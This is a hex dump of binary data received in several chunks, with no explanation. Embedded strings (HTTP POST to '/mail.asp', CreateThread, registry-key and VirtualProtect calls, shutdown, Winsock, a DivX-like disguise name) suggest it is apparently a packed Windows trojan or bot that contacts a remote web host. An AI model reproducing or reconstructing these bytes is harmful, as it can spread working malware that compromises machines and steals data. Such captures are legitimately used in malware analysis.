3b1b 117c 382c 290c 98cf 7052 1806 4c28    ;..|8,)...pR..L(
bfba c383 b307 4cc0 c323 681e e195 3936    ......L..#h...96
170c 52c8 d48f 0584 0b5e 2478 2032 c087    ..R......^$x 2..
ee8b f03a c874 0dd3 0421 1a38 f7e1 439e    ...:.t...!.8..C.
b31e 141e 1f1c 740a 70a3 91d0 1704 1d20    ......t.p...... 
ba20 48bf d4e5 7f08 0675 7124 ffb7 2ad1    . H......uq$..*.
00f1 5700 3c30 725f 3c40 735b 56c8 2169    ..W.<0r_<@s[V.!i
160d 3863 70c6 02d2 2cd8 3e1d 6821 4483    ..8cp...,.>.h!D.
434f fd56 dac8 151a ea8c cf14 a0b7 5fbd    CO.V.........._.
c780 481c 8c19 8bf3 b9d7 355d 438b fbc2    ..H.......5]C...
0071 e705 10c7 82f7 1905 eb81 e50f 4cd2    .q............L.
8acd d1ac a9d7 d510 19d6 104a 6dd4 7040    ...........Jm.p@
1b27 d85a 0977 46de 40c8 81e3 e110 2eba    .'.Z.wF.@.......
139f ae14 14e1 8ad4 3c3c 1c7d d6dc 4837    ........<<.}..H7
1c24 83fe 09cf f67b d325 2820 0f87 b710    .$.....{.%( ....
ff09 08ae fd4f 67ea 34a5 f413 9afb 7ed2    .....Og.4.....~.
9d34 9114 0a86 1809 777f f2f6 b62b 7c83    .4......w....+|.
f808 7683 f904 7183 fa17 18e8 d56c 5397    ..v...q......lS.
3ab9 bbdb dcec 0d8c 3509 e089 3d05 e489    :.......5...=...
2dc6 bee0 9d99 3861 88f0 74f4 27f8 7041    -.....8a..t.'.pA
b28f 9ffc b194 229b 3b0c 9120 270e 04f0    ......".;.. '...
1ab2 2b04 8908 adb1 6212 1a66 f653 69ae    ..+.....b..f.Si.
85e5 ab28 b710 4615 7e5e 8ffd 58eb d53b    ...(..F.~^..X..;
f8aa d3ff 030f 869c 080b 0f83 8a9f faa3    ................
9394 4e14 bb9a 5133 fff6 1dff 6f62 7e2a    ..N...Q3....ob~*
85db 7415 8b56 148a 0417 220b 3c39 7707    ..t..V....".<9w.
1fd7 1deb 3eeb 0233 db4e 474c 7cda 2558    ....>..3.NGL|.%X
3a40 6cd2 07fd 88d4                        :@l.....

Data received:

    
030a 74ef f76b bc45 3cbf f08a 8612 461e    ..t..k.E<.....F.
dd11 2edc 1a80 3f1b 1525 a114 8518 207d    ......?..%.... }
ecd4 d680 c2bc 96b1 3946 83c7 046e c4ec    ........9F...n..
dd5b f07c c9d3 d06f 9c1f 1f9a 1449 885b    .[.|...o.....I.[
ac07 6443 913a 9d69 c001 da1b 2bc2 1262    ..dC.:.i....+..b
bdb3 883b 4263 1f6c 87b8 05b4 9875 7b3e    ...;Bc.l.....u{>
73c8 363b 1730 5001 0399 38c0 8471 7826    s.6;.0P...8..qx&
900c 45e8 13e8 9de1 624f d36c 8c14 d83c    ..E.....bO.l...<
9449 9b84 0ccd 2ac4 dc8c 174c 7c50 371e    .I....*....L|P7.
07e2 d379 d82c 6005 5a7a 637e 8eb2 80b5    ...y.,`.Zzc~....
8580 7524 b185 2542 de54 0e98 3363 62b0    ..u$..%B.T..3cb.
5d57 0c51 4998 0da4 fe46 254e 815c 6569    ]W.QI....F%N.\ei
d662 f4a1 9229 48dc face a719 3c70 87b4    .b...)H.....<p..
3207 4d0e 6430 d7b4 4c93 9d32 8a37 f42f    2.M.d0..L..2.7./
0154 52b9 b053 46f4 1201 5690 815c c803    .TR..SF...V..\..
f500 84f2 402e e4d8 0078 bb00 4372 2017    ....@....x..Cr .
6c9e 60a4 4272 2081 0003 7660 077f 6852    l.`.Br ...v`..hR
2418 4f65 0376 604e 1018 364a 3253 09a3    $.Oe.v`N..6J2S..
3364 f45c c803 f261 e88e 810b b440 2ee4    3d.\...a.....@..
810c 01a8 e440 86e4 ef9c c386 e440 8690    .....@.......@..
a684 5885 e4c0 5689 5d2e ac96 1d61 525d    ..X...V.]....aR]
4860 1756 cb4e 5d28 4af5 3203 7254 0fc6    H`.V.N](J.2.rT..
e68e d523 0851 eb32 5ceb 232e 15cb cbee    ...#.Q.2\.#.....
6a48 50eb 1c24 7c32 0d03 cc2e 561b 6ac4    jHP..$|2....V.j.
0141 1cc8 c965 4cc0 5144 44b7 2cb6 9b12    .A...eL.QDD.,...
64fc 211c 863c 75ba 650b fc20 49c0 6fe6    d.!..<u.e.. I.o.
532f d884 d687 b68a 33d2 2da9 961a 8c51    S/......3.-....Q
c8a5 d9c9 3200 0b7d 1900 87be 1739 f800    ....2..}.....9..
0681 f439 4393 cda0 d380 15f0 371b 7292    ...9C.......7.r.
3313 8cec 513d c891 992e e49c 3be0 800c    3...Q=......;...
2003 dcd8 c0cc 0032 d4c8 7206 9001 64c4     ......2..r...d.
c0bc 6f72 d843 b90c fac4 067b 01f9 6bf4    ..or.C.....{..k.
fcb4 5266 17c0 9241 06e4 b0c4 a819 b237    ..Rf...A.......7
d913 a489 3ba0 c201                        ....;...

Data received:

    
6400 9c98 5293 1c81 b307 1c02 1590 3f20    d...R.........? 
02d9 b2c3 8617 7c41 13cb 265b 3668 7d13    ......|A..&[6h}.
607d c803 e164 134c 51fd e402 c35c e4e4    `}...d.LQ....\..
e402 4441 1032 73b2 c738 5046 0e2c 512e    ..DA.2s..8PF.,Q.
2327 27ec 24b5 5c01 f460 ecb0 6191 017e    #''.$.\..`..a..~
1cf0 bac9 964d b613 ecba 1303 c890 bde4    .....M..........
ba3b e0dc 3280 0c20 d8d4 64c0 cc00 1836    .;..2.. ..d....6
c4b2 b192 01c0 4952 0f66 8e42 6ff7 bdcc    ......IR.f.Bo...
5132 4775 f6ed f3d7 c21c 2d71 f00a 4772    Q2Gu......-q..Gr
d9b2 ed32 e0dc 2447 7224 d8d4 919c cd6a    ...2..$Gr$.....j
d42d c464 001b c9c0 d54c eb62 430e 50d1    .-.d.....L.bC.P.
4650 d523 3992 014c 4c92 2339 924c 4c4c    FP.#9..LL.#9.LLL
4e9e 2339 4c4c 004c 408e e448 4c4c 5824    N.#9LL.L@..HLLX$
b991 a680 006c 5ec9 09e3 8400 a880 0080    .....l^.........
00c0 16f2 4a80 003b 0690 01e4 e0dc d8de    ....J..;........
2b19 40d4 63f4 f34a 0690 cb36 c4c0 842e    +.@.c..J...6....
69d9 fca3 4899 0e4b 32f2 63f0 4c17 e813    i...H..K2.c.L...
d261 93e0 0ee0 e080 9087 3cb0 023c 8402    .a........<..<..
8002 0e9b 1d96 0ed8 b50e d00d 020f e4b5    ................
1588 9551 97c0 5df1 15c4 df0f 859d 8a52    ...Q..]........R
3beb 9c7c 16bc 86cf 5016 67b3 1ee8 ac0d    ;..|....P.g.....
7391 4098 4e36 4863 1260 9f52 5375 4d65    s.@.N6Hc.`.RSuMe
8fcb 3efb 500f 3d24 7373 0736 e175 2d29    ..>.P.=$ss.6.u-)
321a 6bfa c09f 23d8 d3e1 1504 8bfd 70d0    2.k...#.......p.
032c 63ff be24 0bbb b180 91a9 52f7 6b27    .,c..$......R.k'
85ff 00a7 c36c 0763 4cb4 1f83 9af8 753c    .....l.cL.....u<
8bb3 005c 81e2 ffff 8059 aa47 b938 1c73    ...\.....Y.G.8.s
64f4 4e72 2db4 1003 c981 e4e9 00cc 00a8    d.Nr-...........
bd42 0692 008b 7f72 08a3 4318 b07f 52ac    .B.....r..C...R.
8c0e 6174 7f39 a87f 19a4 813e d021 7e21    ..at.9.....>.!~!
89eb 136e 71a0 0ff4 eb0c 53eb 0538 d425    ...nq.....S..8.%
d158 52d3 2dd5 e28e 6f2e aab0 1f74 3481    .XR.-...o....t4.
ff64 8272 2466 5bbb ed36 93be c466 3d54    .d.r$f[..6...f=T
7216 051e 7775 044b                        r...wu.K

Data received:

    
a210 27b4 0862 5db7 b92b f8f2 4ba1 51b0    ..'..b]..+..K.Q.
1042 4f4b a20b 8455 1075 4ba2 4ba2 d38d    .BOK...U.uK.K...
d3a5 ba23 07e1 d3eb 79f1 62c0 741d 85c0    ...#....y.b.t...
ab0e 5f65 5e25 d763 af90 ef7f 83fa 0175    .._e^%.c.......u
643b f972 606e c085 8884 06e4 2585 e440    d;.r`n......%..@
a355 ac82 bc63 8cdf 22d0 b23a 9de9 033e    .U...c.."..:...>
2495 097a ff55 8bec 6a33 bc6c 0a81 50b8    $..z.U..j3.l..P.
42c0 6401 0cb0 01fc bb64 8925 0781 ec60    B.d......d.%...`
066c 5614 cce8 06c2 8975 646c 80b7 832c    .lV......udl...,
7521 368d 45f0 6d42 0609 7eb6 bd8b 4df0    u!6.E.mB..~...M.
340d 6b5b 8be5 5def 04cf fa70 8935 4db9    4.k[..]....p.5M.
0f07 7d88 0178 60b3 de07 7dc4 4239 13bf    ..}..x`...}.B9..
55bf fd75 628b 7d3b 4f1c 8b91 7084 b859    U..ub.};O...p..Y
17b7 d109 5eea e5f7 a2d8 8bda c10e 895d    ....^..........]
e4c0 ef36 771b 4720 8808 d226 bc41 8995    ...6w.G ...&.A..
e4fa f877 b70b 416a 287f 8850 bc1e a11c    ...w..Aj(..P....
0156 68e9 fdef ee3e 0359 4456 561a 4dc4    .Vh....>.YDVV.M.
51a0 5588 52eb bd40 9aed 588b 4561 4868    Q.U.R..@..X.EaHh
8b81 ee8d 8c8c 5988 8d1e 3859 6e66 5bc9    ......Y...8Ynf[.
ceb1 74c4 5f88 51a3 f621 d60d 1583 6558    ..t._.Q..!....eX
3151 230c 4840 840a 86b0 27dc 343c 53c9    1Q#.H@....'.4<S.
1b04 b910 0abd a014 8fda 44fb 643a e4e8    ..........D.d:..
7799 ac7c f8c6 851a 26a0 5f11 731f 6f85    w..|....&._.s.o.
450b ff44 1dac d9dc 0200 4610 2247 3d17    E..D......F."G=.
5b3e f3e6 150c 8895 4833 0d49 2264 cbd8    [>......H3.I"d..
1b4a 4535 1e4b 46df 195b be2e 1f4c 464d    .JE5.KF..[...LFM
690e 63cb 842c 4e0f 4f46 5037 6cf9 2235    i.c..,N.OFP7l."5
2051 2333 193b 63cb 2152 4553 6910 83d9     Q#3.;c.!RESi...
2664 5411 3355 1e1a b160 ec50 8dd8 50fe    &dT.3U...`.P..P.
a3cc 3670 fe13 4c8d 8dfc eb06 17cb be49    ..6p..L........I
7660 88c8 1024 4813 1079 8810 5c3e 8834    v`...$H..y..\>.4
f03d 2e5a 393d 4226 38f3 0110 1388 d795    .=.Z9=B&8.......
1a05 c3e0 b564 287c 16fd 9b6c b27c 7b34    .....d(|...l.|{4
8825 383c 3965 970d                        .%8<9e..

Data received:

    
252c 3888 c897 ec6c 0b33 4427 3548 162b    %,8....l.3D'5H.+
d928 229f 5678 9207 f638 1a65 2089 bdd4    .(".Vx...8.e ...
2ac6 b9e0 7623 d4fa 8347 722b bb57 0e7c    *...v#...Gr+.W.|
62d4 fa18 6c66 e924 33d2 0cd8 05dc 64cf    b...lf.$3.....d.
d8d6 6606 e048 b208 ffff ffff d853 4207    ..f..H.......SB.
e364 df8d 0f51 6eb9 3287 0cfa ef94 ec20    .d...Qn.2...... 
6510 5fa3 1ce9 6ca5 49a5 0a3c 0c0d 0252    e._...l.I..<...R
01ba 98a2 1c40 0e9e fbf8 081d 28f9 6a73    .....@......(.js
2644 1876 2915 31a3 4a85 90e4 c026 80f6    &D.v).1.J....&..
340f e440 9876 3b2c 88c8 4cd8 8c25 3e47    4..@.v;,..L..%>G
28ec 94e4 8187 bcfa 1acd 8524 0f65 2067    (..........$.e g
ccf9 8dde 240f 7f05 518b 9567 5285 156f    ....$...Q..gR..o
96e4 c262 1839 2364 425e 0858 ccf9 0f4f    ...b.9#dB^.X...O
1e80 1cd0 f9d0 f948 b384 02e7 248b 1dd0    .......H....$...
5ade acf7 2d28 5012 70e1 2099 e4ca 7390    Z...-(P.p. ...s.
0864 431e 6490 222e 386d 0cc6 4172 9016    .dC.d.".8m..Ar..
3ae8 082f 48ee 5360 0ef1 cb43 2e0c 38c7    :../H.S`...C..8.
e8fa 7df4 e88d 9f66 93fa 283b 4c8b d0ad    ..}....f..(;L...
42b0 94b9 8455 523b 9958 36e9 1d0c d2da    B....UR;.X6.....
42d6 c413 4ba7 b2b8 6049 2182 4591 0805    B...K...`I!.E...
b215 6bbe c31c 2c08 b423 1e64 1784 8763    ..k...,..#.d...c
7414 2934 80d8 6a47 3e31 4067 cc45 fc1c    t.)4..jG>1@g.E..
8900 06c7 d232 c8e0 4beb 2a36 d484 c856    .....2..K.*6...V
842e 04a8 257a 7903 7429 0275 7ef0 088c    ....%zy.t).u~...
1374 4886 c740 d758 bedd 2cfa 8ceb 310b    .tH..@.X..,...1.
2851 10ea 0055 b358 6411 3957 a5e4 85f9    (Q...U.Xd.9W....
656c 5438 d14a a8a7 6b7e 1009 839f 9e10    elT8.J..k~......
57ff df51 14ea a67e 108a 043e 3c5c 7409    W..Q...~...><\t.
3c3a 7405 0b3b 7ab7 4e0f 7ff0 1870 2bc6    <:t..;z.N....p+.
5744 63dd 0ce2 3e01 5023 e8c3 380c 11c2    WDc...>.P#..8...
6605 da3c 05ee 8407 f9fc c63e 100f c065    f..<.......>...e
fd90 6f56 ec83 e862 4603 012a 504d bdc2    ..oV...bF..*PM..
6365 50ee 83fe ff36 4374 74f4 14f6 6a1a    ceP....6Ctt...j.
feb5 57e3 4dc4 495c                        ..W.M.I\

Data received:

    
4cbb 56c6 043a 8cc4 90c5 3b48 5abf 6c00    L.V..:....;HZ.l.
b306 0bcf 550c a1bf 7d43 7586 532b 188b    ....U...}Cu.S+..
dd2b dea9 3355 0403 34db 16cd fe07 2c03    .+..3U..4.....,.
4788 0646 21ec e8d7 5f94 fc11 d85d c33f    G..F!..._....].?
2134 232c 21c8 4f94 4c27 3334 662c 3345    !4#,!.O.L'34f,3E
0ca3 521f ff7f 429d 7fdb b02a 33c9 b893    ..R...B....*3...
2449 928a 0c3e 57f7 2f90 0ce2 e903 d1c4    $I...>W./.......
cf52 c1e1 9780 43fd 032b ca03 d946 9e20    .R....C..+...F. 
8bc3 af63 b046 1e4f b86a ac0b 0c42 7109    ...c.F.O.j...Bq.
bf0c b350 c727 9476 ec99 7898 bf78 c20c    ...P.'.v..x..x..
6656 3852 3f12 746a e835 b0e3 195d b403    fV8R?.tj.5...]..
317c b829 d595 ce62 09e1 c18b c1b1 4240    1|.)...b......B@
8016 746e f418 6258 04a0 de43 6d43 6450    ..tn..bX...CmCdP
0857 0d60 87c4 2037 9524 6858 8b67 f800    .W.`.. 7.$hX.g..
cdf8 7868 0cbb 9317 8df7 d831 9a6a fc63    ..xh.......1.j.c
1bc0 657b 7869 3418 2f6e 1252 a323 70d8    ..e{xi4./n.R.#p.
2efd 8080 5f53 0c83 fd74 72b0 8197 c515    ...._S...tr.....
046a 0218 84fd b060 2ca2 915b 5469 67c7    .j.....`,..[Tig.
806f 50e6 7c96 7e58 1c4c 6653 ec40 b110    .oP.|.~X.LfS.@..
7e34 4c2d 8b58 5ff1 9a50 37a4 ceba 0340    ~4L-.X_..P7....@
10d7 3548 a37a d820 c0d3 ec7b 0f8c 91e0    ..5H.z. ...{....
018f ebd9 4aee d592 dd67 5c49 8754 6110    ....J....g\I.Ta.
c726 c17c 6c8c 0c4c 1bff d70b 1ac9 6410    .&.|l..L......d.
480e f2c5 4eb2 83bc 8418 1049 ccbd ecd5    H...N......I....
5b16 df27 671c 0dc8 859d 10d7 21d0 0cd5    [..'g.......!...
ebd9 9d10 d777 66f0 9ca7 3dcc 7def 9e0b    .....wf...=.}...
260c 6111 852c 93c9 ce8e 1d66 e40b d717    &.a..,.....f....
887b d965 b3d8 0b17 e46a 66c8 100b f863    .{.e.....jf....c
368c 1c66 c066 d314 0ea0 bb66 c4a0 04c6    6..f.f.....f....
377a d812 753d 181f 1a34 0fe0 5038 5eee    7z..u=...4..P8^.
5918 6a06 46d3 6028 dddf 04c0 1699 39b8    Y.j.F.`(......9.
66a1 05bc f390 ad75 3564 3a36 6810 200d    f......u5d:6h. .
c9f2 7268 6a05 5ee3 4101 acdd b71b fb35    ..rhj.^.A......5
b066 83b4 3c6c 8a15                        .f..<l..

Data received:

    
b641 70b6 5134 10ed 74bc 764a b697 3b1e    .Ap.Q4..t.vJ..;.
1680 3f70 6a0a 4713 824a 0274 275f 40c2    ..?pj.G..J.t'_@.
a4a8 bd70 5c6e 1ef6 7437 17d0 746a 05a4    ...p\n..t7..tj..
14b9 6c21 d203 4a50 fd9c 699e e639 a0a2    ..l!..JP..i..9..
0c10 12b2 fc34 0f18 f010 dc0e 8204 0553    .....4.........S
2343 9498 c203 6c83 789a 9a30 34a0 3640    #C....l.x..04.6@
2cbf 353d 1940 4f34 4052 68ec da8b 05e9    ,.5=.@O4@Rh.....
4e1e 9601 8c90 f754 bcdc 3cec 5836 32d0    N......T..<.X62.
586a 0581 0242 0863 17b2 0680 3584 3370    Xj...B.c....5.3p
7703 fc88 8984 2494 7d8c 2498 0688 9424    w.....$.}.$....$
d856 3207 d17e 0e84 17ae 6479 e16a 0806    .V2..~....dy.j..
b021 4707 780f 799a 1341 7c3c 401b 3021    .!G.x.y..A|<@.0!
c1fd 3440 9820 7b42 791b 9ae7 8470 3e74    ..4@. {By....p>t
7638 302b 90f3 b0fc 343c aca0 5209 5150    v80+....4<..R.QP
975c 3858 5276 28e9 413c bac0 6634 2323    .\8XRv(.A<..f4##
c4c6 2472 3c38 7e16 3328 e666 6b72 543c    ..$r<8~.3(.fkrT<
cdc9 85d0 3e3c b8bc 509f 8665 3c54 7b3c    ....><..P..e<T{<
54ee e167 ec5b 187b 36ac bbb0 3c63 2c1f    T..g.[.{6...<c,.
7b44 a07a 4c54 923f 13d2 444c 5168 2728    {D.zLT.?..DLQh'(
7cdd c817 bca4 a835 68a3 6c19 9f8e 6579    |......5h.l...ey
fc6c 8429 796e 64e4 5bf6 9ca0 a23f 96f1    .l.)ynd.[....?..
229e 1c20 d979 6f61 7c16 0420 cc23 79fb    ".. .yoa|.. .#y.
9ede 4993 6836 6e3b 3624 7c79 c068 2679    ..I.h6n;6$|y.h&y
4424 2450 68fc edba 9321 e1bc 8c90 f75c    D$$Ph....!.....\
3f0d cb78 607a f460 1101 42f3 3094 2c06    ?..x`z.`..B.0.,.
5034 54f3 1963 4856 0254 7c89 c11f 96b0    P4T..cHV.T|.....
fd24 06c0 e82e c30f 3664 a825 b628 81c4    .$......6d.%.(..
c7e0 2936 419f 2409 4d24 1083 27e4 c97c    ..)6A.$.M$..'..|
5856 cb35 14a7 723e d16b 2cc6 60a4 c21c    XV.5..r>.k,.`...
d96c 8d24 5063 15af 4c00 6788 41fa c0fb    .l.$Pc..L.g.A...
01c9 03cc e83e 1f3e 8e94 7367 9867 9cb3    .....>.>..sg.g..
08a9 49e0 6971 0c10 8588 b338 1684 266c    ..I.iq.....8..&l
5a0c 683d 7b27 b429 0e75 1050 48aa a2d1    Z.h={'.).u.PH...
c1ae e0c3 d057 51ea                        .....WQ.

Data received:

    
1f05 6bef acad 3664 403a 1203 c313 9f2f    ..k...6d@:...../
608b f8b2 80c9 4051 c71a 6804 2a50 c52c    `.....@Q..h.*P.,
5148 3042 671a 17dc 1274 6583 9dd1 8406    QH0Bg....te.....
5c6b 5f6c d040 67b0 dc80 318c 4fc5 0988    \k_l.@g...1.O...
03ed 42ac 0425 7b06 8236 0c32 147b 2b98    ..B..%{..6.2.{+.
3fee 0175 1dce 4d13 be78 4b58 7486 85dc    ?..u..M..xKXt...
eac5 2322 ec8d fe39 a0a6 4f3d cddb 7214    ..#"...9..O=..r.
81e9 4b3d f6fb 0b2d 0485 0117 73ec 2bc8    ..K=...-....s.+.
c488 5b6c 6f0c 8be1 8bb9 40d0 c3cc b841    ..[lo.....@....A
6cd4 ff6a 8bb8 4d10 05ff 168e 89ae d103    l..j..M.........
c63b fe76 08fe 1fee 2e60 8278 57f7 c703    .;.v.....`.xW...
3d14 c1e9 0283 e203 83f9 f8f7 dbdf 5629    =.............V)
f3a5 ff24 9513 3fd8 8bc7 ba1c 83e9 0472    ...$..?........r
d92e db37 dfe0 0303 c817 853e f01e 8d9b    ...7.......>....
ae7b b6e8 9007 6c90 0400 032c 5023 6ebb    .{....l....,P#n.
45fd d18a 0688 078a 7247 0105 0256 92b1    E.......rG...V..
656b 0859 c6c7 5ccc b28c 257b 8d49 002b    ek.Y..\...%{.I.+
2501 02dd d924 cf02 a690 2346 2147 6bbe    %....$....#F!Gk.
807c 3f8c 73cf bc07 a669 9aa6 b4ac a49c    .|?.s....i......
94a6 699a ff8c 8b44 8ee4 8944 8fe4 e8e8    ..i....D...D....
ec9a a669 9aec f0f0 f4f4 f86f eea6 69f8    ...i.......o..i.
fcfc 8d04 d700 03f0 0332 dd3b 84f8 09ff    .........2.;....
f003 f097 a255 2172 eb74 5e5f 6603 7b85    .....U!r.t^_f.{.
c9c4 9d0b f943 4270 c111 a30d 0a41 78fb    .....CBp.....Ax.
302b 8d74 3167 7c39 fc7f e5d8 f692 240d    0+.t1g|9......$.
fde3 fc77 4170 1c82 3bc2 f7d9 6541 204b    ...wAp..;...eA K
8ff9 75cf 9e9c 2b40 7821 7090 0b88 dd0a    ..u...+@x!p.....
5bd3 03a8 d06d 033a 6f03 4ed8 0bc8 d758    [....m.:o.N....X
4f56 b697 1ff2 dd2e 21a3 ee02 ef02 298c    OV......!.....).
24bc 6503 9027 24ab 808d 57b6 2d03 ae45    $.e..'$...W.-..E
5aa6 eb16 d641 5b06 2403 2c9a a669 9a34    Z....A[.$.,..i.4
3c44 4c54 679a a669 1a97 1c1c 1818 1469    <DLTg..i.......i
9aa6 6914 1010 0c0c 2369 9aa6 0808 0404    ..i.....#i......
9aa6 eb0e 1f05 8003                        ........

Data received:

    
8898 ac96 e05a 128b b7b5 870c 6c21 cc0f    .....Z......l!..
8313 3575 3a21 b7cc cc37 b455 e0a7 9f15    ..5u:!...7.U....
2f41 e0ff 75be 4394 5ddc 3755 911d ab04    /A..u.C.].7U....
f741 0406 8fbb 38c1 919e 740f 149b 8902    .A....8...t.....
2dd0 b987 b8a5 c33e 1210 16fe bb19 f4fe    -......>........
40e8 64ff 35bc 7919 208b 0bdc 01b7 582f    @.d.5.y. .....X/
700c 1e2e 3b74 4f74 8db7 b1fe 288d 3476    p...;tOt....(.4v
8b0c b3fc 4817 7cb3 0417 fbed dff7 1268    ....H.|........h
0101 2db3 7d42 9aff 5408 ebc3 648f 0543    ..-.}B..T...d..C
1b91 6bc1 3a8c 9e64 f05d 8203 414e 7904    ..k.:..d.]..ANy.
6875 eade bfb0 3f51 3a52 0c39 5108 7505    hu....?Q:R.9Q.u.
9b8a 516b 05bb ab7d b0eb 0a08 0c61 0ee2    ..Qk...}.....a..
856d 4b02 4355 6b0c 59ba 1a94 fb6f ef56    .mK.CUk.Y....o.V
4332 3058 4330 30f7 6202 b10d fffa fc8b    C20XC00.b.......
5d0c 0ff7 40e4 af1a 5bfb c582 c145 f812    ]...@...[....E..
e145 bafe 5db6 d608 3e21 737b 08c1 618d    .E..]...>!s{..a.
0c76 bbb5 7fd9 b18f 7445 5655 8d6b 10a8    .v......tEVU.k..
0b5d 5e41 c18e 70bf 0bc0 7433 783c 2554    .]^A..p...t3x<%T
41c4 b813 bdce 4c1d 560c 5636 db3e d94a    A.....L.V.V6.>.J
fcde 8f8b 048f 550c 3b8e d577 ae08 301a    ......U.;..w..0.
8b34 8feb a146 eb1c 51c9 7ec7 c9eb 155c    .4...F..Q.~....\
6aff 3f1e e010 2283 9455 c929 4b76 5b2a    j.?..."..U.)Kv[*
9150 0318 5024 e120 6cb3 4100 2570 0000    .P..P$. l.A.%p..
1585 ac28 09f0 cc0c ff09 32cc 2400 1b11    ...(......2.$...
1013 03f9 1f80 2f6d 6169 6c2e 6173 70b2    ....../mail.asp.
96b0 9767 6261 6f15 2712 ff9a a108 ffff    ...gbao.'.......
ffff ff36 0643 7265 6174 6554 6864 0f5c    ...6.CreateThd.\
6b65 728f fd9b ff6e 656c 3332 2e64 6c6c    ker....nel32.dll
7368 7574 646f 776e 1b57 7332 db3f 7bb0    shutdown.Ws2.?{.
5f19 5265 673a 4b65 7945 7841 3741 7ddb    _.Reg:KeyExA7A}.
25f9 6476 6170 691f 5175 4a79 5661 6c6f    %.dvapi.QuJyValo
d967 af06 2013 5365 7411 43bb bdfd ef6c    .g.. .Set.C....l
6f73 4200 5669 7274 7519 5072 6f52 6374    osB.Virtu.ProRct
1b6d dddb 7f26 7a74                        .m...&zt

Data received:

    
3d6f 6e6c 698b 2675 3d3b 6114 69b7 59ec    =onli.&u=;a.i.Y.
b60f 3d8a 6d6f a71b 0969 736b adfd 2613    ..=.mo...isk..&.
6e6f 91db 0f20 3b4b 16f9 6f66 6634 4600    no... ;K..off4F.
5bba 76e7 fe74 6f6b 2661 0b62 6578 6907    [.v..tok&a.bexi.
0474 75b7 f60b 8530 3077 1300 3f2a 43b7    .tu....00w..?*C.
ed6f ad37 8802 2d54 7970 653a d870 4c63    .o.7..-Type:.pLc
61db 6fb7 7f81 2f78 2d77 002d 666a 6d2d    a.o.../x-w.-fjm-
7572 6c22 63ef ffdf 6d5a 6570 4163 6365    url"c...mZepAcce
7074 3a20 2a2f 2a00 504f 5354 4f2a b4d7    pt: */*.POSTO*..
fe48 5454 502f 312e 54bf 007f dfdf bea3    .HTTP/1.T.......
0c74 7470 3a2f 0944 6976 7844 653c 72b7    .ttp:/.DivxDe<r.
5fc2 0e31 dffb 7761 936d 62b6 f0f7 b168    _..1..wa.mb....h
b5cc a8b7 fe43 7477 2e2e 6725 bce4 c9ed    .....Ctw..g%....
2e77 13ba ab6b 72c5 b7e4 c94b 9e65 75c3    .w...kr....K.eu.
c075 73ee 3ef6 bf31 2d34 2d31 30c7 f8f3    .us.>..1-4-10...
2d36 2d39 0a33 2d37 15fe b1c7 1035 2d38    -6-9.3-7.....5-8
0763 6e38 2e67 7275 0101 1990 cd30 0b35    .cn8.gru.....0.5
3790 0119 9033 3936 1990 0119 3231 3440    7....396....214@
1980 2631 6479 a3f0 dfd4 4f46 5457 4152    ..&1dy....OFTWAR
455c 4d6c 0773 6f66 8ead 70a1 6475 615c    E\Ml.sof..p.dua\
6517 5c6d f2b3 ddc2 6c6d 8673 3174 6617    e.\m....lm.s1tf.
6b6f 4b52 f202 f901 656e 4742 5553 29e1    koKR....enGBUS).
c242 0d00 8700 bb1d f273 7563 6326 086d    .B.......succ&.m
3d23 36c6 5ce9 6820 1a23 2f76 614d 8d9f    =#6.\.h .#/vaM..
d40f 6367 646b 5783 3d54 c6c6 e98d 6f3f    ..cgdkW.=T....o?
6576 6517 1266 395b 7e1d ed4d 6116 6c35    eve..f9[~..Ma.l5
0f46 6f31 07ff 7587 d916 9341 7307 6666    .Fo1..u....As.ff
6572 43b9 e7cd 2000 6953 6e69 4d26 c9b3    erC... .iSniM&..
77e1 3e37 3237 0f0b 3139 5ba4 2779 3230    w.>727..19[.'y20
3132 331b e679 47ba 2db9 7a46 7f77 706b    123..yG.-.zF.wpk
208f 7468 7f77 7bbf 65fe 204e 870b 2045     .th.w{.e. N.. E
27d6 aecd de2d cede 3fc6 9fff cfde d6c6    '....-..?.......
b0e6 2121 21be aeb5 d757 2f4e 742f 326e    ..!!!....W/Nt/2n
ecbb fb6b 2f58 702f                        ...k/Xp/

Data received:

    
5a33 a3ac 8b6f c920 c60d f7c2 bb20 ec39    Z3...o. ..... .9
782f 4dc7 6f63 6b1a b76f f776 f9bd 2900    x/M.ock..o.v..).
c9f1 d2f4 0328 d3b0 0fc6 f717 bbcb efdb    .....(..........
d0e1 03cd f8c2 e723 b0e6 cad4 1fb2 e22f    .......#......./
b526 7fbb 3630 31d0 542e 4275 0877 bb6c    .&..601.T.Bu.w.l
1ba6 b4f3 03bc ec20 70be dc3a 92ed 0fc4    ....... p..:....
bed3 cecf b7f2 6477 f843 2666 9607 7a79    ......dw.C&f..zy
6a73 ad4d 9e0c 6264 6a16 0b72 0de1 c970    js.M..bdj..r...p
6e70 3dc7 0d19 a1a9 cd1b f62f dce7 68c2    np=......../..h.
5bfb ffbf a8c9 bab5 c2c0 ad2c bcd3 0408    [..........,....
b6fb 2cfb 2c59 b056 6743 1f7f b064 8d93    ..,.,Y.VgC...d..
2164 7366 61c2 e4ff 7ff7 b766 06ca b5d4    !dsfa......f....
dad0 d008 61b6 afc9 cfbe cdca c7d2 aab1    ....a...........
a3c6 f3db db6f ffd2 b5c8 abb9 fac8 cbf4    .....o..........
b4fa b1ed c419 a9ca d001 b3b7 ffff ffa4    ................
bdaf baea c0a4 cbb5 d3a6 b6d4 bdf0 c8da    ................
cea3 bbfa d5fe b8ae 37b5 bccf bedc ced1    ........7.......
dd09 d6f7 d6bb d3d0 47b2 c5ed dfb0 dbc4    ........G.......
dc09 d4f6 3b4f c8cf ceaa 67ff b781 fdb0    ....;O....g.....
d1b5 b1c7 b049 27b3 d6be adbc c3c6 bdce    .....I'.........
c8bd f4c0 ffbd cfbf ecb7 a2d5 b9b5 c4ff    ................
791a 656d 64aa afe0 63a3 8b96 b802 4880    y.emd...c.....H.
6e7f be19 dd08 2bc6 83c0 0fb6 4809 0350    n.....+.....H..P
083f b299 ff13 6a00 5051 522b a88a 0856    .?....j.PQR+...V
5788 2bfa cf97 0a8d 5508 6a89 1499 8d0c    W.+.....U.j.....
b502 b1e7 4b95 128d 4e0d 5154 4f30 d8c1    ....K...N.QTO0..
022b 5285 4d62 a14b b3c6 c665 47ae 0e57    .+R.Mb.K...eG..W
46c2 ffff 25ca 8e8e 92d8 d1d1 cccc bfc0    F...%...........
bdbe cbd4 cdcd 472d db70 ffd4 9190 c9d1    ......G-.p......
8f8f 33de 7745 ffb7 65ee 4310 4687 9191    ..3.wE..e.C.F...
955b 5656 9e84 8382 bd77 fbff 8192 7f84    .[VV.....w......
